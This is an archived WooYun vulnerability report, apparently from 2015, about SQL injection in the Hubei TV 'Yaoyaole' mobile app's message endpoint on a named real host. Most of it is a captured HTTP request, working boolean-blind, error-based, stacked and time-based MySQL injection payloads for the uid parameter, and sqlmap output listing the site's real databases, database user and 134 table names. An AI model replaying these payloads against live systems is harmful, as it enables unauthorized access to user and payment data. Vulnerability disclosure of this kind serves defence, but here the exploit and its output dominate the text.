乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-09: 细节已通知厂商并且等待厂商处理中 2015-01-14: 厂商已经确认,细节仅向厂商公开 2015-01-24: 细节向核心白帽子及相关领域专家公开 2015-02-03: 细节向普通白帽子公开 2015-02-13: 细节向实习白帽子公开 2015-02-23: 细节向公众公开
每天晚上看电视 ,电视里播的 ,乌云肯定要有啊
先看图吧
湖北经视官方应用 经视摇摇乐手机app 发现存在注入
GET /mobile/memberMsg/getMsg?uid=108514 HTTP/1.1Host: mylive.moyuntv.comProxy-Connection: keep-aliveReferer: http://mylive.moyuntv.com/html/wap/userMsg.htmlX-Requested-With: XMLHttpRequestAccept: application/json, text/javascript, */*; q=0.01User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; zh-cn; I318_T3 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30Accept-Encoding: gzip,deflateAccept-Language: zh-CN, en-USAccept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7Cookie: SERVERID=22115a7fc2c2cdf4460032a2809aff4a|1420720839|1420720839
GET /mobile/memberMsg/getMsg?uid=108514 HTTP/1.1Host: mylive.moyuntv.comProxy-Connection: keep-aliveReferer: http://mylive.moyuntv.com/html/wap/userMsg.htmlX-Requested-With: XMLHttpRequestAccept: application/json, text/javascript, */*; q=0.01User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; zh-cn; I318_T3 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30Accept-Encoding: gzip,deflateAccept-Language: zh-CN, en-USAccept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7Cookie: SERVERID=22115a7fc2c2cdf4460032a2809aff4a|1420720839|1420720839此包存在注入Place: GETParameter: uid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: uid=108514 AND 8100=8100 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: uid=108514 AND (SELECT 2922 FROM(SELECT COUNT(*),CONCAT(0x3a646a67a,(SELECT (CASE WHEN (2922=2922) THEN 1 ELSE 0 END)),0x3a726a723a,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: uid=108514; SELECT SLEEP(5);-- Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: uid=108514 AND SLEEP(5)---[20:54:14] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.3back-end DBMS: MySQL 5.0[20:54:14] [INFO] fetching current user[20:54:14] [INFO] retrieved: operlive@%current user: 'operlive@%'[20:54:14] [INFO] fetching database names[20:54:15] [INFO] the SQL query used returns 7 entries[20:54:15] [INFO] retrieved: information_schema[20:54:15] [INFO] retrieved: hm_live[20:54:15] [INFO] retrieved: hm_live_perinstall[20:54:15] [INFO] retrieved: my_ad[20:54:15] [INFO] retrieved: my_score[20:54:15] [INFO] retrieved: mysql[20:54:15] [INFO] retrieved: performance_schemaavailable databases [7]:[*] hm_live[*] hm_live_perinstall[*] information_schema[*] my_ad[*] my_score[*] mysql[*] performance_schema其中hm_live_perinstall库就有134个表 其他的库你们看着办喽you provided a HTTP Cookie header value. The target url provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] y[22:02:52] [INFO] the SQL query used returns 134 entries[22:02:52] [INFO] retrieved: hm_aca[22:02:52] [INFO] retrieved: hm_activity[22:02:52] [INFO] retrieved: hm_activity_apply[22:02:52] [INFO] retrieved: hm_annunciate[22:02:52] [INFO] retrieved: hm_app_recommend[22:02:52] [INFO] retrieved: hm_app_recommend_stat[22:02:53] [INFO] retrieved: hm_baoliao[22:02:53] [INFO] retrieved: hm_c_activity[22:02:53] [INFO] retrieved: hm_c_article[22:02:53] [INFO] retrieved: hm_c_ecommerce[22:02:53] [INFO] retrieved: hm_c_guess[22:02:53] [INFO] retrieved: hm_c_link[22:02:53] [INFO] retrieved: hm_c_localshop[22:02:53] [INFO] retrieved: hm_c_pic[22:02:53] [INFO] retrieved: hm_c_prize[22:02:54] [INFO] retrieved: hm_c_q_answer[22:02:54] [INFO] retrieved: hm_c_special[22:02:54] [INFO] retrieved: hm_c_video[22:02:54] [INFO] retrieved: hm_c_vote[22:02:54] [INFO] retrieved: hm_card_type[22:02:54] [INFO] retrieved: hm_cash_action[22:02:54] [INFO] retrieved: hm_cash_log[22:02:54] [INFO] retrieved: hm_cash_withdraw[22:02:55] [INFO] retrieved: hm_catalog[22:02:55] [INFO] retrieved: hm_catalog_purview[22:02:55] [INFO] retrieved: hm_channel[22:02:55] [INFO] retrieved: hm_channel_control[22:02:55] [INFO] retrieved: hm_channel_prize[22:02:55] [INFO] retrieved: hm_channel_program[22:02:56] [INFO] retrieved: hm_channel_purview[22:02:56] [INFO] retrieved: hm_channel_schedule[22:02:56] [INFO] retrieved: hm_channel_type[22:02:56] [INFO] retrieved: hm_com_app[22:02:56] [INFO] retrieved: hm_com_app_version[22:02:56] [INFO] retrieved: hm_com_apply[22:02:56] [INFO] retrieved: hm_com_config[22:02:56] [INFO] retrieved: hm_com_feedback[22:02:57] [INFO] retrieved: hm_com_game[22:02:57] [INFO] retrieved: hm_com_user[22:02:57] [INFO] retrieved: hm_comment[22:02:57] [INFO] retrieved: hm_company[22:02:57] [INFO] retrieved: hm_config[22:02:57] [INFO] retrieved: hm_config_copy[22:02:57] [INFO] retrieved: hm_content[22:02:57] [INFO] retrieved: hm_content_log[22:02:57] [INFO] retrieved: hm_content_model[22:02:58] [INFO] retrieved: hm_content_stat[22:02:58] [INFO] retrieved: hm_content_status[22:02:58] [INFO] retrieved: hm_coupons[22:02:58] [INFO] retrieved: hm_dnamedia[22:02:58] [INFO] retrieved: hm_ecommerce[22:02:58] [INFO] retrieved: hm_egoods[22:02:58] [INFO] retrieved: hm_form_option[22:02:58] [INFO] retrieved: hm_form_type[22:02:58] [INFO] retrieved: hm_game[22:02:59] [INFO] retrieved: hm_game_copy[22:02:59] [INFO] retrieved: hm_group[22:02:59] [INFO] retrieved: hm_guess_log[22:02:59] [INFO] retrieved: hm_guess_object[22:02:59] [INFO] retrieved: hm_guess_option[22:02:59] [INFO] retrieved: hm_info_content[22:03:00] [INFO] retrieved: hm_info_type[22:03:00] [INFO] retrieved: hm_interact[22:03:00] [INFO] retrieved: hm_local_goods[22:03:00] [INFO] retrieved: hm_login_log[22:03:00] [INFO] retrieved: hm_lottery[22:03:00] [INFO] retrieved: hm_lottery_code[22:03:00] [INFO] retrieved: hm_lottery_log[22:03:00] [INFO] retrieved: hm_lottery_type[22:03:01] [INFO] retrieved: hm_manual_control_log[22:03:01] [INFO] retrieved: hm_member[22:03:01] [INFO] retrieved: hm_member_data[22:03:01] [INFO] retrieved: hm_member_detail[22:03:01] [INFO] retrieved: hm_member_findpwd[22:03:01] [INFO] retrieved: hm_member_group[22:03:01] [INFO] retrieved: hm_member_login_log[22:03:01] [INFO] retrieved: hm_member_msg[22:03:01] [INFO] retrieved: hm_member_score[22:03:02] [INFO] retrieved: hm_member_thirdaccount[22:03:02] [INFO] retrieved: hm_member_vest[22:03:02] [INFO] retrieved: hm_menu[22:03:02] [INFO] retrieved: hm_menu_copy[22:03:02] [INFO] retrieved: hm_merchant_home[22:03:02] [INFO] retrieved: hm_message[22:03:02] [INFO] retrieved: hm_news_recommend[22:03:02] [INFO] retrieved: hm_oplog[22:03:03] [INFO] retrieved: hm_order[22:03:03] [INFO] retrieved: hm_pay_callback_log[22:03:03] [INFO] retrieved: hm_pic[22:03:03] [INFO] retrieved: hm_plug_part[22:03:03] [INFO] retrieved: hm_prize[22:03:03] [INFO] retrieved: hm_prize_catalog[22:03:04] [INFO] retrieved: hm_prize_exchange[22:03:04] [INFO] retrieved: hm_prize_show_log[22:03:04] [INFO] retrieved: hm_prize_type[22:03:04] [INFO] retrieved: hm_prized_log[22:03:04] [INFO] retrieved: hm_qa_log[22:03:04] [INFO] retrieved: hm_qa_option[22:03:04] [INFO] retrieved: hm_rank_user_num[22:03:04] [INFO] retrieved: hm_recommend_home[22:03:04] [INFO] retrieved: hm_recommend_type[22:03:05] [INFO] retrieved: hm_report[22:03:05] [INFO] retrieved: hm_role[22:03:05] [INFO] retrieved: hm_role_aca[22:03:05] [INFO] retrieved: hm_score_activity[22:03:05] [INFO] retrieved: hm_score_log[22:03:05] [INFO] retrieved: hm_score_rule[22:03:05] [INFO] retrieved: hm_sensitive_word[22:03:05] [INFO] retrieved: hm_sensitive_word_type[22:03:06] [INFO] retrieved: hm_share_score_log[22:03:06] [INFO] retrieved: hm_shop_seckill[22:03:06] [INFO] retrieved: hm_shop_voucher_log[22:03:06] [INFO] retrieved: hm_signin[22:03:06] [INFO] retrieved: hm_site_share[22:03:06] [INFO] retrieved: hm_sms[22:03:06] [INFO] retrieved: hm_spchoujiang[22:03:06] [INFO] retrieved: hm_spcomment[22:03:06] [INFO] retrieved: hm_task[22:03:07] [INFO] retrieved: hm_task_condition[22:03:07] [INFO] retrieved: hm_task_log[22:03:07] [INFO] retrieved: hm_task_prize_rand_log[22:03:07] [INFO] retrieved: hm_task_restrictions_type[22:03:07] [INFO] retrieved: hm_task_type[22:03:07] [INFO] retrieved: hm_temp_lotterywin[22:03:08] [INFO] retrieved: hm_terminal_info[22:03:08] [INFO] retrieved: hm_topic__bak[22:03:08] [INFO] retrieved: hm_unique_score[22:03:08] [INFO] retrieved: hm_user_oplog[22:03:08] [INFO] retrieved: hm_validate[22:03:08] [INFO] retrieved: hm_video[22:03:08] [INFO] retrieved: hm_vms_catalog_purview[22:03:08] [INFO] retrieved: hm_vote_detail[22:03:09] [INFO] retrieved: hm_vote_option[22:03:09] [INFO] retrieved: hm_vote_statDatabase: hm_live_perinstall[134 tables]+---------------------------+| hm_aca || hm_activity || hm_activity_apply || hm_annunciate || hm_app_recommend || hm_app_recommend_stat || hm_baoliao || hm_c_activity || hm_c_article || hm_c_ecommerce || hm_c_guess || hm_c_link || hm_c_localshop || hm_c_pic || hm_c_prize || hm_c_q_answer || hm_c_special || hm_c_video || hm_c_vote || hm_card_type || hm_cash_action || hm_cash_log || hm_cash_withdraw || hm_catalog || hm_catalog_purview || hm_channel || hm_channel_control || hm_channel_prize || hm_channel_program || hm_channel_purview || hm_channel_schedule || hm_channel_type || hm_com_app || hm_com_app_version || hm_com_apply || hm_com_config || hm_com_feedback || hm_com_game || hm_com_user || hm_comment || hm_company || hm_config || hm_config_copy || hm_content || hm_content_log || hm_content_model || hm_content_stat || hm_content_status || hm_coupons || hm_dnamedia || hm_ecommerce || hm_egoods || hm_form_option || hm_form_type || hm_game || hm_game_copy || hm_group || hm_guess_log || hm_guess_object || hm_guess_option || hm_info_content || hm_info_type || hm_interact || hm_local_goods || hm_login_log || hm_lottery || hm_lottery_code || hm_lottery_log || hm_lottery_type || hm_manual_control_log || hm_member || hm_member_data || hm_member_detail || hm_member_findpwd || hm_member_group || hm_member_login_log || hm_member_msg || hm_member_score || hm_member_thirdaccount || hm_member_vest || hm_menu || hm_menu_copy || hm_merchant_home || hm_message || hm_news_recommend || hm_oplog || hm_order || hm_pay_callback_log || hm_pic || hm_plug_part || hm_prize || hm_prize_catalog || hm_prize_exchange || hm_prize_show_log || hm_prize_type || hm_prized_log || hm_qa_log || hm_qa_option || hm_rank_user_num || hm_recommend_home || hm_recommend_type || hm_report || hm_role || hm_role_aca || hm_score_activity || hm_score_log || hm_score_rule || hm_sensitive_word || hm_sensitive_word_type || hm_share_score_log || hm_shop_seckill || hm_shop_voucher_log || hm_signin || hm_site_share || hm_sms || hm_spchoujiang || hm_spcomment || hm_task || hm_task_condition || hm_task_log || hm_task_prize_rand_log || hm_task_restrictions_type || hm_task_type || hm_temp_lotterywin || hm_terminal_info || hm_topic__bak || hm_unique_score || hm_user_oplog || hm_validate || hm_video || hm_vms_catalog_purview || hm_vote_detail || hm_vote_option || hm_vote_stat |+---------------------------+未进一步深入
你懂的
危害等级:高
漏洞Rank:11
确认时间:2015-01-14 11:15
暂无